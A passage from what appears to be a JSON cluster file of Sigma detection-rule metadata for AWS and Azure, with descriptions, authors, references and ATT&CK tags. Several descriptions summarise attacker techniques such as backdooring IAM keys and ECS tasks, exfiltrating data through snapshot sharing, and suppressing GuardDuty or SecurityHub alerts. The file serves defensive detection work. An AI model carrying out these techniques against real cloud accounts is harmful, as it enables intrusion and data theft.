The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", - "meta": { - "author": "faloker", - "creation_date": "2020/02/12", - "falsepositive": [ - "Valid changes to the startup script" - ], - "filename": "aws_ec2_startup_script_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_startup_script_change.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.004" - ] - }, - "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", - "value": "AWS EC2 Startup Shell Script Change" - }, - { - "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", - "meta": { - "author": "Diogo Braz", - "creation_date": "2020/04/16", - "falsepositive": "No established falsepositives", - "filename": "aws_ec2_vm_export_failure.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_vm_export_failure.yml" - ], - "tags": [ - "attack.collection", - "attack.t1005", - "attack.exfiltration", - "attack.t1537" - ] - }, - "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", - "value": "AWS EC2 VM Export Failure" - }, - { - "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a 
lab environment.\n", - "meta": { - "author": "Darin Smith", - "creation_date": "2022/06/07", - "falsepositive": [ - "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons" - ], - "filename": "aws_ecs_task_definition_backdoor.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", - "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", - "https://attack.mitre.org/techniques/T1525", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1525" - ] - }, - "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", - "value": "AWS ECS Backdoor Task Definition" - }, - { - "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "aws_efs_fileshare_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", - "value": "AWS EFS Fileshare Modified or Deleted" - }, - { - "description": "Detects when a EFS Fileshare Mount is modified or deleted. 
An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", - "value": "AWS EFS Fileshare Mount Modified or Deleted" - }, - { - "description": "Identifies when an EKS cluster is created or deleted.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/16", - "falsepositive": [ - "EKS Cluster being created or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "aws_eks_cluster_created_or_deleted.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://any-api.com/amazonaws_com/eks/docs/API_Description", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", - "value": "AWS EKS Cluster Created or Deleted" - }, - { - "description": "Detects when an ElastiCache security group has been created.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "aws_elasticache_security_group_created.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_created.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136", - "attack.t1136.003" - ] - }, - "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", - "value": "AWS ElastiCache Security Group Created" - }, - { - "description": "Identifies when an ElastiCache security group has been modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "aws_elasticache_security_group_modified_or_deleted.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ] - }, - "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", - "value": "AWS ElastiCache Security Group Modified or Deleted" - }, - { - "description": "Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.", - "meta": { - "author": "toffeebr33k", - "creation_date": "2020/11/21", - "falsepositive": [ - "AWS Config or other configuration scanning activities" - ], - "filename": "aws_enum_listing.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_listing.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1592" - ] - }, - "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70", - "value": "Account Enumeration on AWS" - }, - { - "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", - "meta": { - "author": "faloker", - "creation_date": "2020/02/11", - "falsepositive": [ - "Valid change in the GuardDuty (e.g. 
to ignore internal scanners)" - ], - "filename": "aws_guardduty_disruption.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_guardduty_disruption.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", - "value": "AWS GuardDuty Important Change" - }, - { - "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n", - "meta": { - "author": "faloker", - "creation_date": "2020/02/12", - "falsepositive": [ - "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)", - "AWS API keys legitimate exchange workflows" - ], - "filename": "aws_iam_backdoor_users_keys.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_backdoor_users_keys.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", - "value": "AWS IAM Backdoor Users Keys" - }, - { - "description": "Detects when an user creates or invokes a lambda function.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/03", - "falsepositive": [ - "Lambda Function created or invoked may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_lambda_function_created_or_invoked.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "d914951b-52c8-485f-875e-86abab710c0b", - "value": "AWS Lambda Function Created or Invoked" - }, - { - "description": "Detects evade to Macie detection.", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/07/06", - "falsepositive": [ - "System or Network administrator behaviors" - ], - "filename": "aws_macic_evasion.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/cli/latest/reference/macie/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_macic_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "91f6a16c-ef71-437a-99ac-0b070e3ad221", - "value": "AWS Macie Evasion" - }, - { - "description": "Detects possible suspicious glue development endpoint activity.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/03", - "falsepositive": [ - "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "aws_passed_role_to_glue_development_endpoint.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", - "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" - ], - "tags": [ - "attack.privilege_escalation" - ] - }, - "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", - "value": "AWS Glue Development Endpoint Activity" - }, - { - "description": "Detects the change of database master password. It may be a part of data exfiltration.", - "meta": { - "author": "faloker", - "creation_date": "2020/02/12", - "falsepositive": [ - "Benign changes to a db instance" - ], - "filename": "aws_rds_change_master_password.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_change_master_password.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ] - }, - "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", - "value": "AWS RDS Master Password Change" - }, - { - "description": "Detects the recovery of a new public database instance from a snapshot. 
It may be a part of data exfiltration.", - "meta": { - "author": "faloker", - "creation_date": "2020/02/12", - "falsepositive": [ - "Unknown" - ], - "filename": "aws_rds_public_db_restore.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_public_db_restore.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ] - }, - "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", - "value": "Restore Public AWS RDS Instance" - }, - { - "description": "Detects AWS root account usage", - "meta": { - "author": "vitaliy0x1", - "creation_date": "2020/01/21", - "falsepositive": [ - "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" - ], - "filename": "aws_root_account_usage.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_root_account_usage.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078.004" - ] - }, - "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", - "value": "AWS Root Credentials" - }, - { - "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", - "meta": { - "author": "Elastic, Austin Songer @austinsonger", - "creation_date": "2021/07/22", - "falsepositive": [ - "A domain transfer lock may be disabled by a system or network administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_route_53_domain_transferred_lock_disabled.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" - ], - "tags": [ - "attack.persistence", - "attack.credential_access", - "attack.t1098" - ] - }, - "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", - "value": "AWS Route 53 Domain Transfer Lock Disabled" - }, - { - "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", - "meta": { - "author": "Elastic, Austin Songer @austinsonger", - "creation_date": "2021/07/22", - "falsepositive": [ - "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "aws_route_53_domain_transferred_to_another_account.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml" - ], - "tags": [ - "attack.persistence", - "attack.credential_access", - "attack.t1098" - ] - }, - "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", - "value": "AWS Route 53 Domain Transferred to Another Account" - }, - { - "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "aws_s3_data_management_tampering.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/pull/1145/files", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", - "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", - "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1537" - ] - }, - "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", - "value": "AWS S3 Data Management Tampering" - }, - { - "description": "Detects the modification of the findings on SecurityHub.", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/06/28", - "falsepositive": [ - "System or Network administrator behaviors", - "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." 
- ], - "filename": "aws_securityhub_finding_evasion.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/cli/latest/reference/securityhub/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_securityhub_finding_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", - "value": "AWS SecurityHub Findings Evasion" - }, - { - "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", - "meta": { - "author": "Darin Smith", - "creation_date": "2021/05/17", - "falsepositive": [ - "Valid change to a snapshot's permissions" - ], - "filename": "aws_snapshot_backup_exfiltration.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://www.justice.gov/file/1080281/download", - "https://attack.mitre.org/techniques/T1537/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1537" - ] - }, - "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", - "value": "AWS Snapshot Backup Exfiltration" - }, - { - "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.", - "Automated processes that uses Terraform may lead to false positives." 
- ], - "filename": "aws_sts_assumerole_misuse.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/pull/1214", - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1548", - "attack.t1550", - "attack.t1550.001" - ] - }, - "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", - "value": "AWS STS AssumeRole Misuse" - }, - { - "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/07/24", - "falsepositive": [ - "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_sts_getsessiontoken_misuse.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/elastic/detection-rules/pull/1213", - "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1548", - "attack.t1550", - "attack.t1550.001" - ] - }, - "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", - "value": "AWS STS GetSessionToken Misuse" - }, - { - "description": "Identifies when suspicious SAML activity has occurred in AWS. 
An adversary could gain backdoor access via SAML.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/09/22", - "falsepositive": [ - "Automated processes that uses Terraform may lead to false positives.", - "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "aws_susp_saml_activity.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078", - "attack.lateral_movement", - "attack.t1548", - "attack.privilege_escalation", - "attack.t1550", - "attack.t1550.001" - ] - }, - "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", - "value": "AWS Suspicious SAML Activity" - }, - { - "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n", - "meta": { - "author": "toffeebr33k", - "creation_date": "2021/08/09", - "falsepositive": [ - "Legit User Account Administration" - ], - "filename": "aws_update_login_profile.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "aws", - "refs": [ - "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_update_login_profile.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", - "value": "AWS User Login Profile Was Modified" - }, - { - "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/08/26", - "falsepositive": [ - "Legitimate AD FS servers added to an AAD Health AD FS service instance" - ], - "filename": "azure_aadhybridhealth_adfs_new_server.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1578" - ] - }, - "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", - "value": "Azure Active Directory Hybrid Health AD FS New Server" - }, - { - "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "creation_date": "2021/08/26", - "falsepositive": [ - 
"Legitimate AAD Health AD FS service instances being deleted in a tenant" - ], - "filename": "azure_aadhybridhealth_adfs_service_delete.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1578.003" - ] - }, - "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", - "value": "Azure Active Directory Hybrid Health AD FS Service Delete" - }, - { - "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", - "meta": { - "author": "Corissa Koopmans, '@corissalea'", - "creation_date": "2022/07/19", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." - ], - "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ] - }, - "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", - "value": "CA Policy Removed by Non Approved Actor" - }, - { - "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? 
Review Modified Properties and compare \"old\" vs \"new\" value.", - "meta": { - "author": "Corissa Koopmans, '@corissalea'", - "creation_date": "2022/07/19", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." - ], - "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ] - }, - "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", - "value": "CA Policy Updated by Non Approved Actor" - }, - { - "description": "Monitor and alert on conditional access changes.", - "meta": { - "author": "Corissa Koopmans, '@corissalea'", - "creation_date": "2022/07/18", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." 
- ], - "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ] - }, - "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", - "value": "New CA Policy by Non-approved Actor" - }, - { - "description": "Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.", - "meta": { - "author": "Corissa Koopmans, '@corissalea'", - "creation_date": "2022/04/21", - "falsepositive": [ - "Failed Azure AD Connect Synchronization", - "Service account use with an incorrect password specified", - "Misconfigured systems", - "Vulnerability scanners" - ], - "filename": "azure_aad_secops_signin_failure_bad_password_threshold.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "dff74231-dbed-42ab-ba49-83289be2ac3a", - "value": "Sign-in Failure Bad Password Threshold" - }, - { - "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", - "meta": { - "author": "AlertIQ", - "creation_date": "2021/10/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_account_lockout.yml", - "level": "medium", - 
"logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_account_lockout.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", - "value": "Account Lockout" - }, - { - "description": "Detects when an account was created and deleted in a short period of time.", - "meta": { - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", - "creation_date": "2022/08/11", - "falsepositive": [ - "Legit administrative action" - ], - "filename": "azure_ad_account_created_deleted.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_account_created_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", - "value": "Account Created And Deleted Within A Close Time Frame" - }, - { - "description": "Detect successful authentications from countries you do not operate out of.", - "meta": { - "author": 